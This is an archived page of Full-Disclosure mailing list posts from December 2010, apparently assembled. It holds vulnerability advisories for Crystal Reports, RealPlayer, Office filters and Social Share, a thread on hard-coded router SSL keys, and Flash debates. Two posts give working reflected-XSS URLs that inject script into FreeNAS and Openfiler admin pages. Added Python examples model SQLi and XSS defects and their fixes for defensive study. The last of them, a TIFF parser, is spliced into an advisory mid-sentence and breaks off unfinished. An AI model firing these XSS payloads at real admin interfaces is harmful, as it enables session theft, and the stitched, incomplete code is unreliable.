Re: [Full-disclosure] 10 OpenBSD facts and is timeline of Backdoor

2010-12-20 Thread Milan Berger
> Extreme Yodaism is my guess...

guess more like locating (icanhashotdog|icanhascheezburger).com


-- 
Kind Regards

Milan Berger
Project-Mindstorm Technical Engineer

--
project-mindstorm.net
90537 Feucht
Germany

http://www.androcom.net
http://www.project-mindstorm.net

twitter: http://twitter.com/twit4c

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CCBILL critical vulnerability story part II

2010-12-20 Thread Maciej Gojny
hello  FULL  DISCLOSURE!

We have found a nice story about our previous ccbill advisory:
http://gfy.com/showthread.php?t=982701&page=2

CCBILL CEO Ron C has written:

This report was a complete joke. This was just a variation of a Nigerian scam. 
We contacted the website and they responded via GMAIL if we would Western 
Union them 10k they would tell us what was wrong. LOL They create a fake 
security page and post stuff and hope companies will pay the blackmail money 
VIA WESTERN UNION (LOL) 
But hey if it is on the Internet it MUST BE TRUE. 
End of Story. 

@Ron C everything you wrote is a lie! We will soon release the full ccbill story
part #2 with CCBILL working exploits, all chat logs etc... I hope you and
William Bell will like it :)

You had enough time to fix all vulnerabilities (4 months).

regards,

Marcin Wrona
Ariko-Security TEAM





Re: [Full-disclosure] CCBILL critical vulnerability story part II

2010-12-20 Thread Jeffrey Walton
On Mon, Dec 20, 2010 at 9:27 AM, Maciej Gojny v...@ariko-security.com wrote:
> hello  FULL  DISCLOSURE!
>
> We have found nice story about our previous ccbill advisory:
> http://gfy.com/showthread.php?t=982701&page=2
>
> CCBILL CEO Ron C has written:
>
> This report was a complete joke. This was just a variation of a Nigerian
> scam. We contacted the website and they responded via GMAIL if we would
> Western Union them 10k they would tell us what was wrong. LOL They create a
> fake security page and post stuff and hope companies will pay the blackmail
> money VIA WESTERN UNION (LOL)

Wow.

It's unfortunate that the vendor did not respond. But in the US,
legislation is such that it's more cost-effective to suffer the breach
and then turn it over to PR ...,
http://seclists.org/fulldisclosure/2010/Aug/188. Quod Erat
Demonstrandum.



[Full-disclosure] www.eVuln.com : postid SQL Injection in Social Share

2010-12-20 Thread Aliaksandr Hartsuyeu
www.eVuln.com advisory:
postid SQL Injection in Social Share
Summary: http://evuln.com/vulns/166/summary.html 
Details: http://evuln.com/vulns/166/description.html 

---Summary---
eVuln ID: EV0166
Software: Social Share
Vendor: n/a
Version: 2010-06-05
Critical Level: medium
Type: SQL Injection
Status: Unpatched. No reply from developer(s)
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )

---Description---
It is possible to inject an arbitrary SQL query using the postid parameter
of the postview.php script.
The postid parameter is used in an SQL query without any sanitisation.

Condition: magic_quotes: off

---PoC/Exploit---
PoC code is available at:
http://evuln.com/vulns/166/exploit.html

---Solution---
Not available

---Credit---
Vulnerability discovered by Aliaksandr Hartsuyeu
http://evuln.com/penetration-test.html - penetration testing service


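The advisory above gives no code, so the following Python is an added example, not code from Social Share or eVuln. It models the defect the advisory describes (a request parameter concatenated into the SQL text) next to the hardened form (shape check plus a bound parameter) against a constructed in-memory SQLite table; the table name, its columns and the `published` flag are assumptions. One caveat on the stated precondition: magic_quotes only backslash-escapes quote characters, so it offers no protection when a value is used in a numeric context like the one modelled here, whereas parameter binding covers both contexts.

```python
import re
import sqlite3

# Constructed sample rows standing in for the application's posts table;
# the real Social Share schema is not on the page.
SAMPLE_POSTS = [
    (1, "welcome", 1),
    (2, "unpublished draft", 0),
    (3, "second post", 1),
]

POSTID_RE = re.compile(r"[0-9]{1,10}")  # what a postid is allowed to look like


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", SAMPLE_POSTS)
    return conn


def view_post_vulnerable(conn, postid):
    """The pattern the advisory describes: the request parameter is pasted
    into the SQL text, so whatever it contains is parsed as SQL. Only the
    published row with that id should ever come back."""
    sql = "SELECT id, title FROM posts WHERE published = 1 AND id = " + postid
    return conn.execute(sql).fetchall()


def view_post_hardened(conn, postid):
    """Hardened form: enforce the expected shape of the value, then bind it
    as a parameter so the engine never treats it as part of the statement."""
    if POSTID_RE.fullmatch(postid) is None:
        raise ValueError("postid must be a decimal integer, got %r" % postid)
    sql = "SELECT id, title FROM posts WHERE published = 1 AND id = ?"
    return conn.execute(sql, (int(postid),)).fetchall()


def hardened_rejects(conn, postid):
    """True when the hardened path refuses the value outright."""
    try:
        view_post_hardened(conn, postid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(view_post_vulnerable(db, "1"))         # [(1, 'welcome')]
    print(view_post_vulnerable(db, "0 OR 1=1"))  # every row, the draft included
    print(view_post_hardened(db, "1"))           # [(1, 'welcome')]
    print(hardened_rejects(db, "0 OR 1=1"))      # True
```

Note that the injected value needs no quote characters at all, which is why escaping-based mitigations do not help in this position; the shape check is what rejects it, and the bound parameter is what keeps the statement fixed even if the shape check is later loosened.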


[Full-disclosure] Secunia Research: SAP Crystal Reports Print ActiveX Control Buffer Overflow

2010-12-20 Thread Secunia Research
== 

 Secunia Research 14/12/2010

   - SAP Crystal Reports Print ActiveX Control Buffer Overflow -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* Crystal Reports 2008 SP3 Fix Pack 3.2 Print ActiveX (12.3.2.753)

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  Remote

== 
3) Vendor's Description of Software 

SAP Crystal Reports software enables you to easily design interactive
reports and connect them to virtually any data source. Your users can
benefit from on-report sorting and filtering giving them the power to
execute decisions instantly.

Product Link:
http://www.sap.com/solutions/sap-crystal-solutions/index.epx

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in SAP Crystal 
Reports, which can be exploited by malicious people to compromise a
user's system.

The vulnerability is caused due to a boundary error in the 
CrystalReports12.CrystalPrintControl.1 ActiveX control
(PrintControl.dll) when processing the ServerResourceVersion
property and can be exploited to cause a heap-based buffer overflow 
via an overly long string.

Successful exploitation allows execution of arbitrary code.

== 
5) Solution 

Set the kill-bit for the affected ActiveX control.

== 
6) Time Table 

19/11/2010 - Vendor notified.
19/11/2010 - Vendor response.
24/11/2010 - Vendor confirms the vulnerability.
14/12/2010 - Independent discovery and public disclosure by a third
 party.
14/12/2010 - Public disclosure.

== 
7) Credits 

Discovered by Dmitriy Pletnev, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-2590 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-135/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==



Re: [Full-disclosure] Default SSL Keys in Multiple Routers

2010-12-20 Thread Craig Heffner
From a security standpoint, it is. But it's easier and probably more cost
effective for the manufacturer.

Sometimes the key will be different between firmware versions, sometimes it
won't. Sometimes the same key will be used for two different models. It just
depends. Some models don't have hard coded keys, but most of the consumer
grade stuff (and even some of the low-end business stuff) does.

- Craig

On Sun, Dec 19, 2010 at 12:17 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:

> These manufacturers use the same key on each of their models?  That seems
> ridiculous to me...
> T
> --
> From: Craig Heffner
> Sent: Sunday, December 19, 2010 5:56 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Default SSL Keys in Multiple Routers
>
>
> Many routers that provide an HTTPS administrative interface use default or
> hard-coded SSL keys that can be recovered by extracting the file system from
> the device's firmware.
>
> The LittleBlackBox project contains a database of over 2,000 (and growing)
> private SSL keys that are correlated with their respective public
> certificates, and hardware/firmware versions. While most of these
> certificates are from DD-WRT firmware, there are also private keys from
> other vendors including Cisco, Linksys, D-Link and Netgear.
>
> Private keys can be recovered by supplying LittleBlackBox with the
> corresponding public key. If the public key is not readily available,
> LittleBlackBox can retrieve the public certificate from a pcap file, live
> traffic capture, or by directly querying the target host.
>
> LittleBlackBox can be downloaded from http://littleblackbox.googlecode.com.
>
> More information is available at
> http://www.devttys0.com/2010/12/breaking-ssl-on-embedded-devices/.



Re: [Full-disclosure] adobe.com important subdomain SQL injection again!

2010-12-20 Thread Serkan Özkan
I think the number of vulnerabilities (according to CVE data from NVD) related
to Flash Player and Adobe products should give an idea about what's going
on:

Number of CVE entries related to any Adobe product :
2006 :  31
2007 :  35
2008 :  64
2009 :  95
2010 : 207
More details : http://www.cvedetails.com/vendor/53/Adobe.html

Number of Flash Player vulnerabilities:
2006 :   5
2007 :  10
2008 :  21
2009 :  20
2010 :  60
More details :
http://www.cvedetails.com/product/6761/Adobe-Flash-Player.html?vendor_id=53


Regards
Serkan Özkan

[Full-disclosure] Secunia Research: RealPlayer AAC Spectral Data Parsing Vulnerability

2010-12-20 Thread Secunia Research
== 

 Secunia Research 10/12/2010

   - RealPlayer AAC Spectral Data Parsing Vulnerability -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* RealPlayer SP 1.1.4
* RealPlayer Enterprise 2.1.2
* Mac RealPlayer 12.0.0.1444

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

RealPlayer® SP lets you download video from thousands of Websites
– free! Just click on the "download this video" button above the video
you want. It's just that easy. Now you can watch your favorite videos
anywhere, anytime.

Product Link:
http://www.real.com/realplayer/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in RealPlayer, which 
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused by an error in the parsing of AAC audio 
content and can be exploited to corrupt memory via specially crafted 
spectral data.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Update to RealPlayer SP 1.1.5, RealPlayer Enterprise 2.1.3, and Mac 
RealPlayer 12.0.0.1548.

== 
6) Time Table 

01/03/2010 - Vendor notified.
01/03/2010 - Vendor response.
11/03/2010 - Vendor provides status update.
19/10/2010 - Vendor provides status update.
29/11/2010 - Vendor provides status update.
10/12/2010 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-0125 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-15/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


[Full-disclosure] Good morning, you can xss freenas stable (0.7.2.5543).

2010-12-20 Thread dave b
Good morning, you can xss freenas stable (0.7.2.5543)
like this

http://192.168.0.1/quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

or this ...
http://192.168.0.1/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes
etc.

This will work regardless of the user being logged into the quixplorer
module or freenas.

--
question = ( to ) ? be : ! be;  -- Wm. Shakespeare



Re: [Full-disclosure] Default SSL Keys in Multiple Routers

2010-12-20 Thread Michal Zalewski
> These manufacturers use the same key on each of their models?  That seems
> ridiculous to me...

As a person who had a Siemens AP / router with a hardcoded, hidden
management account on it, I find your surprise entertaining ;-)

Craig, cool project.

/mz



Re: [Full-disclosure] adobe.com important subdomain SQL injection again!

2010-12-20 Thread John Jester

No real clue how Adobe will counter Flash 5. Perhaps they can use it as an
opportunity to trim the beast down.

-Original Message-
From: Victor Rigo victor_r...@yahoo.com
To: full-disclosure@lists.grok.org.uk
Sent: Mon, Dec 20, 2010 12:56 am
Subject: Re: [Full-disclosure] adobe.com important subdomain SQL injection 
again!




Concurred. No file format is as obnoxious as SWF.

However, with the debut of HTML 5, we're finding that video is being offloaded 
to video and open codecs are being integrated into browsers. Further, HTML 
5's media capabilities are making flash cumbersome.

Try disabling flash extension on Firefox and enjoy real internet.

Victor Rigo, CISSP
Independent Computer Security Consultant
Buenos Aires, AR
+5411-4316-1901

--- On Sun, 12/19/10, Christian Sciberras uuf6...@gmail.com wrote:


From: Christian Sciberras uuf6...@gmail.com
Subject: Re: [Full-disclosure] adobe.com important subdomain SQL injection 
again!
To: Marsh Ray ma...@extendedsubset.com
Cc: Victor Rigo victor_r...@yahoo.com, full-disclosure@lists.grok.org.uk
Date: Sunday, December 19, 2010, 9:25 PM


Personally, I kind of like Flash. It gives me a single kill switch for
90% of the useless blinking crap and popups on the internet. Flash is a
really appropriate name for exactly what I don't want to see on a web
page. I hope it remains the platform of choice for those who develop
such things. - Marsh Ray

I'll keep using that quote till I die...





On Sun, Dec 19, 2010 at 9:32 PM, Marsh Ray ma...@extendedsubset.com wrote:

On 12/18/2010 05:30 PM, Victor Rigo wrote:
> Let's see, flash is:
>
> - Cross-platform
> - Cross-architecture
> - Has its own programming language
> - Is embedded on websites
> - Access to javascript to popup, local caches, etc.


Not on my machine?


> It's not ineptness, it's what you get when you write software that can
> actually do stuff.


Adobe comes from a time when you could write PC software without caring
about security. Yeah, it was a heck of a lot easier to write just about
anything back then because it was well and proper that anything could do
anything.

Nowadays, the first questions after "hey our software could do this" must
be "but should it do that? What else could someone leverage that new
capability to do? How does it combine with every other feature in our
app or even on the whole platform? What if somebody does it repeatedly
in a tight loop? With pathological inputs?" and so on. These questions
take a long time to answer.

So if a vendor is known for letting app developers do more stuff and
not also known for letting users control what stuff gets done on their
own machines then they are laggards, not leaders, in my view.


> If Java applets were still the hip thing, you'd see the same thing about
> that.


There's undoubtedly some truth to that. But at the same time, it doesn't
seem like a useful line of reasoning:

* It's still not an argument for using Flash.

* That Java plugins have had chronic security bugs doesn't mean that
Flash doesn't suck too.

* You seem to imply that you don't think that Adobe is likely to secure
Flash any time soon. You're not saying Adobe will secure Flash in the
next patch and then it will be great. But you listed all the great
stuff it does, so I have to think you would have said something like
that if you believed it. You may be making Flash look worse than it is.

* It's basically an appeal to futility argument: no one could make a
development platform and browser plugin that is significantly more
secure (or does a better job of managing the security vs. doing stuff
trade off) so therefore we should accept the status quo. That's why it's
not useful: it gives no guidance on directions in which to improve.

Personally, I kind of like Flash. It gives me a single kill switch for
90% of the useless blinking crap and popups on the internet. Flash is a
really appropriate name for exactly what I don't want to see on a web
page. I hope it remains the platform of choice for those who develop
such things.

- Marsh




[Full-disclosure] Secunia Research: RealPlayer cook Arbitrary Free Vulnerability

2010-12-20 Thread Secunia Research
== 

 Secunia Research 10/12/2010

 - RealPlayer cook Arbitrary Free Vulnerability -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* RealPlayer SP 1.1.4
* RealPlayer Enterprise 2.1.2
* Mac RealPlayer 11.1
* Linux RealPlayer 11.0.2.1744

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  From remote

== 
3) Vendor's Description of Software 

RealPlayer® SP lets you download video from thousands of Websites
– free! Just click on the "download this video" button above the video
you want. It's just that easy. Now you can watch your favorite videos
anywhere, anytime.

Product Link:
http://www.real.com/realplayer/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in RealPlayer, which 
can be exploited by malicious people to potentially compromise a 
user's system.

The vulnerability is caused due to an error in the handling of errors 
encountered while decoding cook encoded audio content. This can be 
exploited to trigger the use of uninitialised memory and potentially 
free an arbitrary address.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Update to RealPlayer SP 1.1.5, RealPlayer Enterprise 2.1.3, Mac 
RealPlayer 12.0.0.1444, and Linux RealPlayer 11.0.2.2315.

== 
6) Time Table 

26/02/2010 - Vendor notified.
01/03/2010 - Vendor response.
11/03/2010 - Vendor provides status update.
19/10/2010 - Vendor provides status update.
29/11/2010 - Vendor provides status update.
10/12/2010 - Public disclosure.

== 
7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-2579 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-14/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Re: [Full-disclosure] Default SSL Keys in Multiple Routers

2010-12-20 Thread Thor (Hammer of God)
LOL.  Yeah, it seems like I get myself in this cycle of "OMG, really?" followed
by "maybe people are starting to learn" and then back to disappointment.

To be honest, this was something that I never really considered (shared,
persistent keys on routers).  In hindsight, it seems like an obvious concern,
but it is still interesting.

t

> -----Original Message-----
> From: Michal Zalewski [mailto:lcam...@coredump.cx]
> Sent: Monday, December 20, 2010 8:16 AM
> To: Thor (Hammer of God)
> Cc: Craig Heffner; full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Default SSL Keys in Multiple Routers
>
>> These manufacturers use the same key on each of their models?  That
>> seems ridiculous to me...
>
> As a person who had a Siemens AP / router with a hardcoded, hidden
> management account on it, I find your surprise entertaining ;-)
>
> Craig, cool project.
>
> /mz



[Full-disclosure] Secunia Research: Microsoft Office PICT Filter Integer Truncation Vulnerability

2010-12-20 Thread Secunia Research
== 

 Secunia Research 14/12/2010

   - Microsoft Office PICT Filter Integer Truncation Vulnerability -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* Microsoft Office XP SP3
* Microsoft Office 2003 SP3
* Microsoft Office Converter Pack

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: System access
Where:  From remote

== 
3) Vendor's Description of Software 

Microsoft Office is a complete suite of productivity and database
software that will help you save time and stay organized.

Product Link:
http://office.microsoft.com/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Office,
which can be exploited by malicious people to compromise a user's 
system.

The vulnerability is caused by an integer truncation error in the 
PICT import filter (PICTIM32.FLT). This can be exploited to cause a
heap-based buffer overflow by e.g. tricking a user into importing a
specially crafted PICT file.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Apply patches provided by MS10-105.

== 
6) Time Table

14/07/2009 - Vendor notified.
14/07/2009 - Vendor response.
20/08/2009 - Vendor provides status update.
24/09/2009 - Vendor provides status update (scheduled for fall 2009).
29/10/2009 - Vendor provides status update (scheduled for March 2010).
28/05/2010 - Vendor provides status update (slipped from March 2010 
 release and now scheduled for August 2010).
02/06/2010 - Vendor provides status update.
23/07/2010 - Vendor provides status update (slipped from August 2010 
 release and now scheduled for November 2010).
04/11/2010 - Vendor provides status update (slipped from November 2010
 release and now scheduled for December 2010).
08/11/2010 - Vendor informed that December is the final deadline.
20/12/2010 - Public disclosure.

== 
7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-3946 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-34/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


[Full-disclosure] Good morning again! - openfiler xss

2010-12-20 Thread dave b
Good morning again! -- openfiler xss:
https://192.168.0.2:446/admin/system.html?step=2&device=et%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Ebh0

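Both of dave b's reports on this page (the FreeNAS quixplorer `lang`/`order` parameters and the Openfiler `device` parameter) show the same defect: a query parameter is reflected into a quoted HTML attribute without encoding, so a value beginning with `"/>` closes the attribute and the tag. The following Python is an added example, not code from FreeNAS, quixplorer or Openfiler: it decodes the parameter the way the server would, renders it through a constructed stand-in template with and without attribute-context escaping, and adds an allow-list check for a parameter that should only ever carry a language code. `SAMPLE_URL` is the FreeNAS request from the earlier report with its `&` separators restored; `TEMPLATE`, `LANG_RE` and the helper names are assumptions made for the example.

```python
import html
import re
from urllib.parse import unquote_plus, urlsplit

# The FreeNAS request from the report above, with the & separators between
# parameters restored; %22/%3E decodes to "/> which closes the attribute.
SAMPLE_URL = ("http://192.168.0.1/quixplorer/index.php?action=list&order=name"
              "&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E")

# Constructed stand-in for the page fragment that echoes the parameter;
# not the real quixplorer or Openfiler template.
TEMPLATE = '<input type="hidden" name="{name}" value="{value}">'

# Allow-list for a parameter that should only ever carry a language code.
LANG_RE = re.compile(r"[a-z]{2}(?:-[A-Z]{2})?")


def param_from_url(url, name):
    """Decode one query parameter the way the server sees it."""
    for pair in urlsplit(url).query.split("&"):
        key, _, raw = pair.partition("=")
        if key == name:
            return unquote_plus(raw)
    return ""


def render_vulnerable(name, value):
    """The defect: the decoded value lands inside a quoted attribute
    unchanged, so a value starting with "/> ends the attribute and the tag
    and everything after it is parsed as new markup."""
    return TEMPLATE.format(name=name, value=value)


def render_escaped(name, value):
    """Output encoding for attribute context: quote=True also encodes the
    double quote (as &quot;), which is the character that matters here."""
    return TEMPLATE.format(name=name, value=html.escape(value, quote=True))


def is_valid_lang(value):
    """Input validation: the whole value must match the allow-list."""
    return LANG_RE.fullmatch(value) is not None


def render_validated(name, value):
    """Defence in depth: validate first, and still escape on output so the
    template stays safe if the allow-list is later relaxed."""
    if not is_valid_lang(value):
        raise ValueError("rejected %s=%r" % (name, value))
    return render_escaped(name, value)


def contains_script_tag(markup):
    """Detection helper: did a <script> element survive into the output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    lang = param_from_url(SAMPLE_URL, "lang")
    print(render_vulnerable("lang", lang))
    print(render_escaped("lang", lang))
    print(is_valid_lang(lang), is_valid_lang("en"))
```

The same two controls apply to the Openfiler `device` parameter, with a device-name pattern in place of `LANG_RE`; the escaping function is context-specific (attribute value here) and would need a different encoder if the value were reflected into a script block or a URL.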


[Full-disclosure] Secunia Research: Microsoft Office TIFF Image Converter Endian Conversion Vulnerability

2010-12-20 Thread Secunia Research
== 

 Secunia Research 14/12/2010

 - Microsoft Office TIFF Image Converter -
- Endian Conversion Vulnerability -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* Microsoft Office XP SP3
* Microsoft Office Converter Pack

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

Microsoft Office is a complete suite of productivity and database
software that will help you save time and stay organized.

Product Link:
http://office.microsoft.com/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Office, 
which can be exploited by malicious people to potentially compromise a
user's system.

The vulnerability is caused by an error in the TIFF Import/Export 
Graphic Filter (TIFFIM32.FLT) when converting the endianess of certain
data. This can be exploited to corrupt memory via e.g. a specially 
crafted TIFF image.

Successful exploitation may allow execution of arbitrary code when 
processing a TIFF image in an application using the graphics filter 
(e.g. opening the image in Microsoft Photo Editor or importing it into
an Office document).

== 
5) Solution 

Apply patches provided by MS10-105.

== 
6) Time Table 

09/07/2009 - Vendor notified.
09/07/2009 - Vendor response.
15/08/2009 - Vendor provides status update.
25/09/2009 - Vendor provides status update.
11/01/2010 - Status update requested.
11/01/2010 - Vendor provides status update (scheduled for May 2010).
30/04/2010 - Vendor provides status update (slipped from May 2010
 release and now tentatively targeting August 2010).
23/07/2010 - Vendor provides status update (slipped from August 2010
 release and now tentatively targeting November 2010).
11/08/2010 - Vendor provides status update.
04/11/2010 - Vendor provides status update (slipped from November 2010
 release and now scheduled for December 2010).
08/11/2010 - Vendor informed that December is the final deadline.
14/12/2010 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-3949 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-39/

Complete list of vulnerability reports published 
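The TIFF Image Converter advisory above names two points a TIFF reader must get right: converting multi-byte fields according to the byte-order mark, and validating what an IFD entry claims about itself before memory is sized or copied from it. The following Python is an added example, not code from Secunia or Microsoft, showing those checks in a minimal header-plus-IFD parser: it reads everything with the prefix the byte-order mark dictates, bounds the entry count against the real file length, rejects unknown field types, computes each entry's byte count exactly (the place where a parser doing the multiply in 32-bit arithmetic would wrap), and refuses value offsets that fall outside the file. `build_tiff`, `MAX_ENTRIES` and the sample files are constructed for the example.

```python
import struct

# Size in bytes of each TIFF field type (types 1-12 from the TIFF 6.0 spec).
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8, 11: 4, 12: 8}

# Constructed policy cap on entries per IFD, not a value from the spec.
MAX_ENTRIES = 4096


class TiffError(ValueError):
    """Raised for any header or IFD field that fails validation."""


def byte_order(data):
    """Map the byte-order mark to a struct prefix; every multi-byte field
    after it must be converted with this prefix and no other."""
    if len(data) < 8:
        raise TiffError("truncated header (%d bytes)" % len(data))
    if data[:2] == b"II":
        return "<"
    if data[:2] == b"MM":
        return ">"
    raise TiffError("unknown byte order mark %r" % data[:2])


def parse_ifd(data):
    """Validate the header and the first IFD and return its entries as
    (tag, type, count, value_or_offset) tuples."""
    bo = byte_order(data)
    magic, ifd_off = struct.unpack(bo + "HI", data[2:8])
    if magic != 42:
        raise TiffError("bad magic %d (wrong byte order?)" % magic)
    if ifd_off < 8 or ifd_off + 2 > len(data):
        raise TiffError("IFD offset %d outside file" % ifd_off)
    (n,) = struct.unpack(bo + "H", data[ifd_off:ifd_off + 2])
    if n == 0 or n > MAX_ENTRIES:
        raise TiffError("implausible entry count %d" % n)
    # Size the whole directory (count, n entries, next-IFD link) before
    # reading any of it.
    if ifd_off + 2 + n * 12 + 4 > len(data):
        raise TiffError("IFD with %d entries runs past end of file" % n)
    entries = []
    pos = ifd_off + 2
    for _ in range(n):
        tag, typ, count, val = struct.unpack(bo + "HHII", data[pos:pos + 12])
        pos += 12
        if typ not in TYPE_SIZES:
            raise TiffError("unknown field type %d for tag %d" % (typ, tag))
        # A C parser doing this multiply in 32-bit arithmetic would wrap;
        # here the product is exact, so the check below is meaningful.
        nbytes = count * TYPE_SIZES[typ]
        if nbytes > 0xFFFFFFFF:
            raise TiffError("byte count for tag %d overflows 32 bits" % tag)
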